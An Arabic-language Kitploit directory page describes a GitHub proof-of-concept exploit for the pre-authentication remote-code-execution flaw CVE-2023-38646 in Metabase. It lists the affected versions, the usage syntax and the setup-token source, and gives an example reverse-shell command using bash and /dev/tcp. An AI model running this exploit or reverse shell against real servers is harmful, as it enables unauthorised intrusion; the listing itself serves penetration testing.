Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/pyr0sec/cve-2023-38646
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةأداة الوصول عن بعد
GitHubpyr0sec/cve-2023-38646

CVE-2023-38646

نص استغلال لثغرة RCE قبل المصادقة في Metabase (CVE-2023-38646)

عرض المستودع
112منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات مفهوم RCE قبل المصادقة في Metabase (CVE-2023-38646)

هذا نص Python يستغل ثغرة تنفيذ التعليمات البرمجية عن بعد في برنامج تسجيل الدخول لـ Metabase. يسمح لنا بتنفيذ أوامر عشوائية على الخادم قبل المصادقة.

الإصدارات المعرضة للخطر هي Metabase مفتوح المصدر قبل 0.46.6.1 و Metabase Enterprise قبل 1.46.6.1

الاستخدام

root@kitploit:~
python3 exploit.py -u URL -t TOKEN -c COMMAND

الوسائط

root@kitploit:~
-h, --help            يعرض رسالة المساعدة هذه ويخرج
-u URL, --url URL     عنوان الهدف
-t TOKEN, --token TOKEN
                      رمز الإعداد الموجود في /api/session/properties
-c COMMAND, --command COMMAND
                      الأمر المطلوب تنفيذه في الخادم الهدف

مثال

image

الأمر المستخدم: bash -i >& /dev/tcp/10.10.14.26/9001 0>&1

المراجع

التسلسل للوصول إلى RCE قبل المصادقة في Metabase (CVE-2023-38646)

تنزيل الأداة